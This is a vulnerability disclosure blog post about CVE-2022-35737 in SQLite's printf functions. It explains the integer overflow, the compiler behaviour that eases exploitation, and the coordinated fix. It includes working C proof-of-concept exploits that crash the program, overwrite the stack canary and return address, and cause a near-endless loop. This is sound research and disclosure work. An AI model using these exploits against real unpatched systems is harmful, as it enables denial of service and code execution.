https://blog.trailofbits.com/2022/10/25/sqlite-vulnerability-july-2022-library-api/

Trail of Bits Blog


Stranger Strings: An exploitable flaw in SQLite

October 25, 2022

By Andreas Kellas

Trail of Bits is publicly disclosing CVE-2022-35737, which affects
applications that use the SQLite library API. CVE-2022-35737 was
introduced in SQLite version 1.0.12 (released on October 17, 2000)
and fixed in release 3.39.2 (released on July 21, 2022).
CVE-2022-35737 is exploitable on 64-bit systems, and its impact
depends on how the program is compiled. Denial of service is
confirmed in all cases. Arbitrary code execution is confirmed when
the library is compiled without stack canaries, but unconfirmed when
stack canaries are present.

On vulnerable systems, CVE-2022-35737 is exploitable when large
string inputs are passed to the SQLite implementations of the printf
functions and when the format string contains the %Q, %q, or %w
format substitution types. This is enough to cause the program to
crash. We also show that if the format string contains the ! special
character to enable Unicode character scanning, then it is possible
to achieve arbitrary code execution in the worst case, or to cause
the program to hang and loop (nearly) indefinitely.

SQLite is used in nearly everything, from naval warships to
smartphones to other programming languages. The open-source database
engine has a long history of being very secure: many CVEs that are
initially pinned to SQLite actually don't impact it at all. This blog
post describes a vulnerability that does impact certain versions of
SQLite, along with our proof-of-concept exploits. Although this
bug may be difficult to reach in deployed applications, it is a prime
example of a vulnerability that is made easier to exploit by
"divergent representations" that result from applying compiler
optimizations to undefined behavior. In an upcoming blog post, we
will show how to find instances of the divergent representations bug
in binaries and source code.

Background: Stumbling onto a bug

A recent blog post presented a vulnerability in PHP that seemed like
the perfect candidate for a variant analysis. The blog's bug
manifested when a 64-bit unsigned integer string length was
implicitly converted into a 32-bit signed integer when passed as an
argument to a function. We formulated a variant analysis for this bug
class, found a few bugs, and while most of them were banal, one in
particular stood out: a function used for properly escaping quote
characters in the PHP PDO SQLite module. And thus began our strange
journey into SQLite string formatting.

SQLite is the most widely deployed database engine, thanks in part to
its very permissive licensing and cross-platform, portable design. It
is written in C, and can be compiled into a standalone application or
a library that exposes APIs for application programmers to use. It
seems to be used everywhere, a perception that was reinforced when we
tripped right over this vulnerability while hunting for bugs
elsewhere.

static zend_string* sqlite_handle_quoter(pdo_dbh_t *dbh, const zend_string *unquoted, enum pdo_param_type paramtype)
{
    char *quoted = safe_emalloc(2, ZSTR_LEN(unquoted), 3);
    /* TODO use %Q format? */
    sqlite3_snprintf(2*ZSTR_LEN(unquoted) + 3, quoted, "'%q'", ZSTR_VAL(unquoted));
    zend_string *quoted_str = zend_string_init(quoted, strlen(quoted), 0);
    efree(quoted);
    return quoted_str;
}

On line 231 of the PHP source (the sqlite3_snprintf call above), an
unsigned long (2*ZSTR_LEN(unquoted) + 3) is passed as the first
parameter to sqlite3_snprintf, which expects a signed int. Large sizes
are therefore silently converted to a much smaller, or even negative,
value. This felt exciting, and we quickly scripted a simple proof of
concept. We expected to exploit this bug by passing large strings to
the function. The result would be a poorly formatted string with
mismatched quote characters, and possibly SQL injection in vulnerable
applications.
Imagine our surprise when our proof of concept crashed the PHP
interpreter:


There's a bug in my bug!

We quickly determined that the crash was occurring in the SQLite
shared object, so we naturally took a closer look at the
sqlite3_snprintf function.

SQLite implements custom versions of the printf family of functions
and adds the new format specifiers %Q, %q, and %w, which are designed
to properly escape quote characters in the input string in order to
make safe SQL queries. For example, we wrote the following code
snippet to properly use sqlite3_snprintf with the format specifier %q
to output a string where all single-quote characters are escaped with
another single quote. The quotes in the "'%q'" format string also wrap
the entire result in leading and trailing single quotes, the way the
PHP quote function intends:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sqlite3.h>

int main(int argc, char *argv[]) {

    char src[] = "hello, \'world\'!";
    char dst[sizeof(src) + 4];  // Add 4 to account for extra quotes.

    sqlite3_snprintf(sizeof(dst), dst, "'%q'", src);

    printf("src: %s\n", src);
    printf("dst: %s\n", dst);
    return 0;
}


sqlite3_snprintf properly wraps the original string in single quotes,
and escapes any existing single-quotes in the input string.

Next, we changed our program to imitate the behavior of the PHP
script by passing the same large 2GB string directly to
sqlite3_snprintf:

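#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sqlite3.h>

// 0x7fffffff bytes: chosen so that 2*STR_LEN + 3 == 0x100000001,
// mirroring the size computation in the PHP quoter.
#define STR_LEN ((0x100000001 - 3) / 2)

int main(int argc, char *argv[]) {

    char *src = calloc(1, STR_LEN + 1); // Account for NULL byte.
    char *dst = calloc(1, STR_LEN + 3); // Account for extra quotes and NULL byte.
    if (!src || !dst) { printf("bad allocation\n"); return -1; }
    memset(src, 'a', STR_LEN);

    // As in the PHP code, the 64-bit size is implicitly converted to the
    // int size parameter of sqlite3_snprintf.
    sqlite3_snprintf(2*STR_LEN + 3, dst, "'%q'", src);

    printf("src: %s\n", src);
    printf("dst: %s\n", dst);
    free(src);
    free(dst);
    return 0;
}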


A crash! We seem to have found a culprit: large inputs to
sqlite3_snprintf. Thus began a journey down a rabbit hole where we
discovered that SQLite does not properly handle large strings in
parts of its custom implementations of the printf family of
functions. Even further down the rabbit hole, we discovered that a
compiler optimization made it easier to exploit the SQLite
vulnerability.

The Vulnerability

The custom SQLite printf family of functions internally calls the
function sqlite3_str_vappendf, which handles string formatting. Large
string inputs to the sqlite3_str_vappendf function can cause signed
integer overflow when the format substitution type is %q, %Q, or %w.

sqlite3_str_vappendf scans the input fmt string and formats the
variable-sized argument list according to the format substitution
types specified in the fmt string. The case block that handles the
%q, %Q, and %w format specifiers is in src/printf.c, lines 803-850.
It works in two steps:

  * It scans the input string for quote characters to calculate the
    number of output bytes (lines 824-828, the first for loop).
  * It copies the input to the output buffer, adding quote characters
    as required (lines 842-845, the second for loop).

In the snippet below, escarg points to the input string:


case etSQLESCAPE:           /* %q: Escape ' characters */
case etSQLESCAPE2:          /* %Q: Escape ' and enclose in '...' */
case etSQLESCAPE3: {        /* %w: Escape " characters */
  int i, j, k, n, isnull;
  int needQuote;
  char ch;
  char q = ((xtype==etSQLESCAPE3)?'"':'\'');   /* Quote character */
  char *escarg;

  if( bArgList ){
    escarg = getTextArg(pArgList);
  }else{
    escarg = va_arg(ap,char*);
  }
  isnull = escarg==0;
  if( isnull ) escarg = (xtype==etSQLESCAPE2 ? "NULL" : "(NULL)");
  /* For %q, %Q, and %w, the precision is the number of bytes (or
  ** characters if the ! flags is present) to use from the input.
  ** Because of the extra quoting characters inserted, the number
  ** of output characters may be larger than the precision.
  */
  k = precision;
  for(i=n=0; k!=0 && (ch=escarg[i])!=0; i++, k--){
    if( ch==q )  n++;
    if( flag_altform2 && (ch&0xc0)==0xc0 ){
      while( (escarg[i+1]&0xc0)==0x80 ){ i++; }
    }
  }
  needQuote = !isnull && xtype==etSQLESCAPE2;
  n += i + 3;
  if( n>etBUFSIZE ){
    bufpt = zExtra = printfTempBuf(pAccum, n);
    if( bufpt==0 ) return;
  }else{
    bufpt = buf;
  }
  j = 0;
  if( needQuote ) bufpt[j++] = q;
  k = i;
  for(i=0; i<k; i++){
    bufpt[j++] = ch = escarg[i];
    if( ch==q ) bufpt[j++] = ch;
  }
  if( needQuote ) bufpt[j++] = q;
  bufpt[j] = 0;
  length = j;
  goto adjust_width_for_utf8;
}

The number of quote characters (int n) and the number of bytes
scanned in the input string (int i) are used to calculate the maximum
number of bytes required in the output buffer (line 832: n+=i+3).
When int is 32 bits wide, this calculation can overflow n to a
negative value. For example, with n=0 and i=0x7ffffffe, n+i+3 is
0x80000001, which does not fit in a signed 32-bit int. This happens
when the input string contains 0x7ffffffe ASCII characters and no
quote characters.

Lines 833-838 are supposed to ensure that a buffer of sufficient size
is allocated to receive the formatted bytes of the input string. If
the output could exceed etBUFSIZE bytes (70 bytes, by default), the
program dynamically allocates a buffer of sufficient size (line 834).
Otherwise, it expects the output to fit in the stack-allocated buffer
of etBUFSIZE bytes and uses that buffer instead (line 837).

At least i bytes are copied from the input into the destination
buffer. When n overflows to a negative value, the n>etBUFSIZE check
fails and the stack-allocated buffer is used, even though i can far
exceed etBUFSIZE. The result is a stack buffer overflow when the
input string is copied to the output buffer (line 843).

The Exploits

But can we do more interesting things with this vulnerability than
just crash the target program? Of course!

The input string must be very large to reach the bug condition where
n overflows to a negative value at line 832. The challenge is that
when the input string is very large, the variable i (which counts the
number of bytes in the input string) is also very large, resulting in
a lot of data written to the stack and causing the program to crash
at line 843. We set out to determine whether it is possible to cause
n to overflow on line 832, but to also cause i to stay small and
positive at line 843 and thus avoid crashing. We revisit the loop
where i is computed, from lines 824 to 830:

/* For %q, %Q, and %w, the precision is the number of bytes (or
** characters if the ! flags is present) to use from the input.
** Because of the extra quoting characters inserted, the number
** of output characters may be larger than the precision.
*/
k = precision;
for(i=n=0; k!=0 && (ch=escarg[i])!=0; i++, k--){
  if( ch==q )  n++;
  if( flag_altform2 && (ch&0xc0)==0xc0 ){
    while( (escarg[i+1]&0xc0)==0x80 ){ i++; }
  }
}

The purpose of this loop is to scan the input string (escarg) for
quote characters (q), incrementing n each time one is found. Our goal
is a controlled stack buffer overflow that does not crash the
program. For that, the loop must terminate with two conditions met:

  * n+=i+3 produces a value no greater than etBUFSIZE (a macro
    defined as 70), so that the stack buffer is chosen.
  * i is a relatively small positive integer that is still greater
    than etBUFSIZE.

The k and flag_altform2 variables in the loop are related to two
features of the SQLite printf functions: optional precision and the
optional alternate format flag 2, which are both influenced by the
format string. In the example below, including ! in the format string
sets flag_altform2=true, and the .80 sets precision=80:

   sqlite3_snprintf(len, buf, "'%!.80q'", src);

When precision is not set in the format string, it defaults to -1.
Therefore, by default k starts at -1 and the loop decrements it with
each iteration. Assuming the usual 32-bit wraparound, the outer loop
can execute nearly 2^32 times (2^32 - 1, to be exact) before k
reaches 0.

So far in our analysis of CVE-2022-35737, we've made few assumptions
about the format string passed to the vulnerable function, other than
that it contains one of the vulnerable format specifiers (%Q, %q, or
%w). To progress further in our exploitation, we need to make one
more assumption: that flag_altform2 is set by providing a !
character in the format string.

When flag_altform2=true, it is possible to increment i in the inner
loop without decrementing k by including multi-byte UTF-8 characters
in the input string. After a lead byte whose top two bits are set
((ch&0xc0)==0xc0), the inner loop skips every following continuation
byte (10xxxxxx) without touching k.

With this in mind, perhaps we can include enough quote characters in
the input to set n to a large positive integer. We could then cause i
to increment in the inner loop until it wraps back around to a small
positive integer, and somehow exit the loop.

But how will i behave when it overflows beyond the maximum signed
integer value? Will it wrap back to 0, or to a negative value? Is it
possible to tell just by looking at the source code? No, it isn't.
Signed integer overflow is undefined behavior, so we must inspect the
compiled binary to see what choices the compiler made to represent i.

Divergent Representations in the compiled binary

We have been working on an Ubuntu 20.04 host with libsqlite3.so
(SQLite version 3.31.1) installed from the APT package manager, so
that is the compiled binary that we examine in Binary Ninja:


Binary Ninja disassembly of the compiled loop from source code lines
824 to 830, where the escarg input string is scanned for
quote-characters. [1a] and [1b] indicate source line 825 escarg[i]; ...
i++. [2a] and [2b] indicate source line 828 escarg[i+1]; ... i++.

At instruction [1a], r10 contains the address of escarg, and rsi is
used to index into the buffer to fetch a value from it, where the rsi
register was set by sign-extending the 32-bit edx register in the
instruction immediately before it. This corresponds to the escarg[i]
expression on line 825 of the source code. With each loop iteration,
edx is incremented at instruction [1b]. This means that the source
code variable i is represented using signed 32-bit integer semantics,
and so when i reaches the maximum 32-bit positive signed integer
value (0x7fffffff), it will increment to 0x80000000 at [1b], which
will be sign-extended into rsi as 0xffffffff80000000 and used to
negatively index into escarg.

However, instruction [2a] tells a different story. Here, r10 still
contains the address of escarg, but rax+1 is used to index into the
buffer, corresponding to the escarg[i+1] expression on line 828 of
the source code, in the inner loop that scans for unicode characters.
Instruction [2b] increments rax as a 64-bit value, with no 32-bit
sign extension, before looping back to [2a]. Here, i is
represented with unsigned 64-bit integer semantics, so that when i
exceeds the maximum signed 32-bit integer value (0x7fffffff), its
next memory access is to escarg+0x80000000. We have divergent
representations of the same source variable, and two different values
can be read from memory for the same value of the source variable i!
This discovery prompted us to search for more instances of these
"divergent representations," and we describe this search in a
forthcoming blog post.

Okay, so can we use this compilation quirk to set the conditions for
a more interesting exploit of CVE-2022-35737? Turns out, yes.

Controlling the Saved Return Address

Here's a quick recap of the conditions that we are trying to set:


case etSQLESCAPE:           /* %q: Escape ' characters */
case etSQLESCAPE2:          /* %Q: Escape ' and enclose in '...' */
case etSQLESCAPE3: {        /* %w: Escape " characters */
  int i, j, k, n, isnull;
  int needQuote;
  char ch;
  char q = ((xtype==etSQLESCAPE3)?'"':'\'');   /* Quote character */
  char *escarg;

  if( bArgList ){
    escarg = getTextArg(pArgList);
  }else{
    escarg = va_arg(ap,char*);
  }
  isnull = escarg==0;
  if( isnull ) escarg = (xtype==etSQLESCAPE2 ? "NULL" : "(NULL)");
  /* For %q, %Q, and %w, the precision is the number of bytes (or
  ** characters if the ! flags is present) to use from the input.
  ** Because of the extra quoting characters inserted, the number
  ** of output characters may be larger than the precision.
  */
  k = precision;
  for(i=n=0; k!=0 && (ch=escarg[i])!=0; i++, k--){
    if( ch==q )  n++;
    if( flag_altform2 && (ch&0xc0)==0xc0 ){
      while( (escarg[i+1]&0xc0)==0x80 ){ i++; }
    }
  }
  needQuote = !isnull && xtype==etSQLESCAPE2;
  n += i + 3;
  if( n>etBUFSIZE ){
    bufpt = zExtra = printfTempBuf(pAccum, n);
    if( bufpt==0 ) return;
  }else{
    bufpt = buf;
  }
  j = 0;
  if( needQuote ) bufpt[j++] = q;
  k = i;
  for(i=0; i<k; i++){
    bufpt[j++] = ch = escarg[i];
    if( ch==q ) bufpt[j++] = ch;
  }
  if( needQuote ) bufpt[j++] = q;
  bufpt[j] = 0;
  length = j;
  goto adjust_width_for_utf8;
}

We concentrate on three parts of this listing:

  * [1] is the scanning loop (for(i=n=0; ...)).
  * [2] is the size computation (n += i + 3).
  * [3] is the copy loop (for(i=0; i<k; i++)), which writes to bufpt.

We want the loop at [1] to terminate with values of i and n set so
that the calculation at [2] overflows, resulting in a value of n that
is negative or less than etBUFSIZE (70) and i set to a relatively
small positive integer value that is greater than etBUFSIZE. This
would allow the loop at [3] to write beyond the bounds of the
stack-allocated bufpt, but without causing the program to crash
immediately by writing beyond the stack memory region.

Consider the string input that contains 0x7fffff00 single-quote (')
characters, followed by a single 0xc0 byte (a Unicode prefix byte) and
then by enough 0x80 bytes to bring the total string length to
0x100000100 bytes (followed by a NULL byte). Let's call this string
string1, and think about what happens when this string is passed to
sqlite3_snprintf:

sqlite3_snprintf(len, buf, "'%!q'", string1);

(Notice that we've changed the format string to allow Unicode
characters by providing the ! character.)

When the loop at [1] scans the first 0x7fffff00 bytes of string1, n
and i both increment to 0x7fffff00. On the next loop iteration, the
program reads the Unicode prefix byte from the input string and
enters the inner loop, where i is represented with 64-bit unsigned
semantics. The i variable increments to 0x100000100 before a NULL
byte is encountered, causing the inner loop to terminate. At this
point in program execution, n=0x7fffff00 and, when truncated to a
32-bit value, i=0x100.

If the loop at [1] terminated at this point, the computation n+=i+3
would result in n=0x80000003, which is negative when treated as a
signed value. Meanwhile, i would be a small positive integer greater
than 70 (etBUFSIZE). The copy loop would therefore write 256 (0x100)
bytes into a stack buffer of 70 bytes.

This shows progress towards our goal. A couple of hundred extra bytes
written to the stack are unlikely to reach the end of the stack
memory region, but they are likely to reach interesting data saved on
the stack, such as saved return addresses and stack canaries. We can
determine the exact position of this data on the stack by inspecting
the target binary, and then adjust the input string size to control
how much data overflows the stack buffer.

Unfortunately, this approach will not work as-is, because the loop at
[1] does not terminate at the point described above. Because of the
divergent representations of the i variable, escarg[i+1] at line 828
(inner loop) will represent i as 0x100000100 and read a NULL byte at
the end of our large string, but escarg[i] at line 825 (outer loop)
will represent i as 0x100 and instead read a single-quote character
(') from near the beginning of the input string. As a result, the
loop exit condition is not met and the loop continues, with i=0x100
and n=0x7fffff00. Notably, by this point k has decremented 0x7fffff00
times. Because there is no NULL byte in the first 2^31 bytes of the
input string, escarg[i] will never read a NULL byte at line 825, and we
have to instead depend on k decrementing to 0 in order to exit the
loop at [1]. We can accomplish this by allowing the outer loop to
continue incrementing until k has decremented all the way to 0, but
with specially calculated values for n and i.

With this thought in mind, we can take the same approach described
above, which is to increment n to a very large positive value by
supplying single-quote characters in the input string, and to then
set i to a small positive value by supplying unicode characters to
increment i using 64-bit unsigned semantics. We calculate our values
by accounting for the fact that the outer loop will increment 2^32
times because k needs to decrement from 0xffffffff to 0.

Our proof of concept uses this insight to control the number of bytes
that overflow the stack-allocated buffer and overwrite the saved
return address and stack canary:

#include <assert.h>
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <sqlite3.h>

// Offsets relative to sqlite3_str_vappendf stack frame base. Calculated using
// the version of libsqlite3.so.0.8.6 provided by apt on Ubuntu 20.04.
#define RETADDR_OFFSET  0
#define CANARY_OFFSET   0x40
#define BUF_OFFSET      0x88
#define CANARY          0xbaadd00dbaadd00dull
#define ROPGADGET       0xdeadbeefdeadbeefull
#define NGADGETS        1

struct payload {
    uint8_t padding1[BUF_OFFSET-CANARY_OFFSET];
    uint64_t canary;
    uint8_t padding2[CANARY_OFFSET-RETADDR_OFFSET-8];
    uint64_t ropchain[NGADGETS];
}__attribute__((packed, aligned(1)));

int main(int argc, char *argv[]) {
    char dst[256];
    struct payload p;
    memset(p.padding1, 'a', sizeof(p.padding1));
    p.canary = CANARY;
    memset(p.padding2, 'b', sizeof(p.padding2));
    p.ropchain[0] = ROPGADGET;

    size_t target_n = 0x80000000;
    assert(sizeof(p) + 3 <= target_n);
    size_t n = target_n - sizeof(p) - 3;
    size_t target_i = 0x100000000 + (sizeof(p) / 2);

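    // Allocate just over 4GB for the crafted input string.
    char *src = calloc(1, target_i);
    if (!src) { printf("bad allocation\n"); return -1; }

    size_t cur = 0;
    // The payload goes first; these bytes are what end up on the stack.
    memcpy(src, &p, sizeof(p));
    cur += sizeof(p);
    // Single quotes inflate the quote counter n.
    memset(src+cur, '\'', n/2);
    cur += n/2;
    // Quote-free filler up to just below the signed 32-bit limit.
    assert(cur < 0x7ffffffeul);
    memset(src+cur, 'c', 0x7ffffffeul-cur);
    cur += 0x7ffffffeul-cur;
    // A Unicode prefix byte followed by continuation bytes: with the !
    // flag, the inner loop advances i as a 64-bit value past 0xffffffff.
    src[cur] = '\xc0';
    cur++;
    memset(src+cur, '\x80', target_i - cur);
    cur = target_i;
    src[cur-1] = '\0';  // Terminate the string.

    sqlite3_snprintf((int) 256, dst, "'%!q'", src);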
    free(src);
    return 0;
}


This proof of concept still crashes the program, but with a SIGABRT
rather than a SIGSEGV. This indicates that the stack canary was
overwritten and that the stack-protector check aborted the program
when the vulnerable function tried to return. The earlier proof of
concept, by contrast, crashed before reaching the function return.

To confirm that we have successfully controlled the saved return
address and stack canary, we can use GDB to view the stack frame
before the vulnerable function returns:


Executing the proof of concept in a debugger shows that the saved
return address is set to 0xdeadbeefdeadbeef.

Note that in a non-contrived scenario, a real stack canary will
contain a NULL byte, which would defeat the proof of concept above
because the NULL byte will cause the string-scanning loop to
terminate before the entire payload is copied over the return
address. Clever exploitation techniques or specific format string
conditions may allow an attacker to bypass this, but our intention is
to show that the saved return address can be overwritten.

Looping (Nearly) Forever

We took our exploitation one step further and developed a proof of
concept that uses the divergent representations of the i variable to
make loop [1] iterate nearly forever, incrementing i on the order of
2^64 times. This is achieved by causing the inner loop to increment i
about 2^32 times on every iteration of loop [1], which itself iterates
about 2^32 times. The interesting part of
this proof of concept is that it doesn't actually reach the
vulnerable integer overflow computation on line 832, but uses only
the undefined behavior that results from allowing string inputs
larger than what can be represented with 32-bit integers. All that is
required is to fill a buffer of 0x100000000 bytes with unicode prefix
characters (a single byte of 0xc0 followed by bytes of 0x80), and the
loop at [1] will never terminate:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sqlite3.h>

int main(int argc, char *argv[]) {
    // 0x100000000 bytes of input plus a terminating NULL byte.
    size_t src_buf_size = 0x100000001;

    char *src = calloc(1, src_buf_size);
    if (!src) {
        printf("bad allocation\n");
        return -1;
    }
    // A Unicode prefix byte followed by 0xffffffff continuation bytes.
    src[0] = '\xc0';
    memset(src+1, '\x80', 0xffffffff);

    char dst[256];
    // With the ! flag, this call loops (nearly) forever instead of returning.
    sqlite3_snprintf(256, dst, "'%!q'", src);
    free(src);
    return 0;
}

We showed that CVE-2022-35737 is exploitable when large string inputs
are passed to the SQLite implementations of the printf functions and
when the format string contains the %Q, %q, or %w format substitution
types. This is enough to cause the program to crash. We also showed
that if the format string additionally allows for Unicode characters
by providing the ! character, then it is possible to overwrite the
saved return address and to cause the program to loop (nearly)
infinitely.

But, SQLite is well-tested, right?

SQLite is extensively tested with 100% branch test coverage. We
discovered this vulnerability despite the tests, which raises the
question: how did the tests miss it?

SQLite maintains an internal limit of 1GB on string size, so the
vulnerability is not reachable through SQLite's own use of these
functions. The problem is "defined away" by the notion that SQLite
does not support the big strings necessary to trigger this
vulnerability.

However, the C APIs provided by SQLite do not enforce that their
inputs adhere to the memory limit, and applications are able to call
the vulnerable functions directly. The notion that large strings are
unsupported by SQLite is not communicated with the API, so
application developers cannot know how to enforce input size limits
on these functions. When this code was first written, most processors
had 32-bit registers and 4GB of addressable memory, so allocating 1GB
strings as input was impractical. Now that 64-bit processors are
quite common, allocating such large strings is feasible and the
vulnerable conditions are reachable.

Unfortunately, this vulnerability is an example of one where
extensive branch test coverage does not help, because no new code
paths are introduced. 100% branch coverage means that every branch
has been taken, but says nothing about how many times or with what
values. This vulnerability is the result of invalid data that causes
code to execute billions of times more than it should.

The thoroughness of SQLite's tests is remarkable; the discovery of
this vulnerability should not be taken as a knock on the robustness
of the tests. In fact, we wish more projects put as much emphasis on
testing as SQLite does. Nonetheless, this bug is evidence that even
the best-tested software can have exploitable bugs.

Conclusion

Not every system or application that uses the SQLite printf functions
is vulnerable. For those that are, CVE-2022-35737 is a critical
vulnerability that can allow attackers to crash or control programs.
The bug has been particularly interesting to analyze, for a few
reasons. For one, the inputs required to reach the bug condition are
very large, which makes it difficult for traditional fuzzers to
reach, and so techniques like static and manual analysis were
required to find it. For another, it's a bug that may not have seemed
like an error at the time that it was written (dating back to 2000 in
the SQLite source code) when systems were primarily 32-bit
architectures. And, most interestingly to us at Trail of Bits, its
exploitation was made easier by the discovered "divergent
representations" of the same source variable, which we explore
further in a separate blog post.

I'd like to thank my mentor, Peter Goodman, for his expert guidance
throughout my summer internship with Trail of Bits. I'd also like to
thank Nick Selby for his help in navigating the responsible
disclosure process, and all members of the Trail of Bits team who
assisted in advising and writing this blog post.

Coordinated disclosure

July 14, 2022: Reported vulnerability to the Computer Emergency
Response Team (CERT) Coordination Center.
July 15, 2022: CERT/CC reported vulnerability to SQLite maintainers.
July 18, 2022: SQLite maintainers confirmed the vulnerability and
fixed it in source code.
July 21, 2022: SQLite maintainers released SQLite version 3.39.2 with
fix.

We would like to thank the teams at SQLite and CERT/CC for working
swiftly with us to address these issues.


By Trail of Bits

Posted in Attacks, Internship Projects
